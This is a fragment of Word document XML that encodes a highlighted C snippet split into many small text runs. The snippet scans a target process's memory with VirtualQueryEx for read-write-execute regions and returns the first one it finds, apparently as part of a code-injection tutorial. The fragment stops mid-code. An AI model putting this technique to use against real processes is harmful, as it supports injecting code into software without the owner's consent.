      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> address </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>do</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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un"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>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ln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>MEMORY_BASIC_INFORMATION m</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>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ln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> result </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>VirtualQueryEx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>process</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>LPVOID</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>address</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>MEMORY_BASIC_INFORMATION</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>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ln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AllocationProtect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>==</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> PAGE_EXECUTE_READWRITE</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>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ln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>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ln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"YAAY - RWX found at 0x%x\n"</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>BaseAddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>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ln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>BaseAddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>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ln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>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ln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">address </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>==</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>long</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>BaseAddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>long</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>RegionSize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>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ln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>break</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>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Style w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>address</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
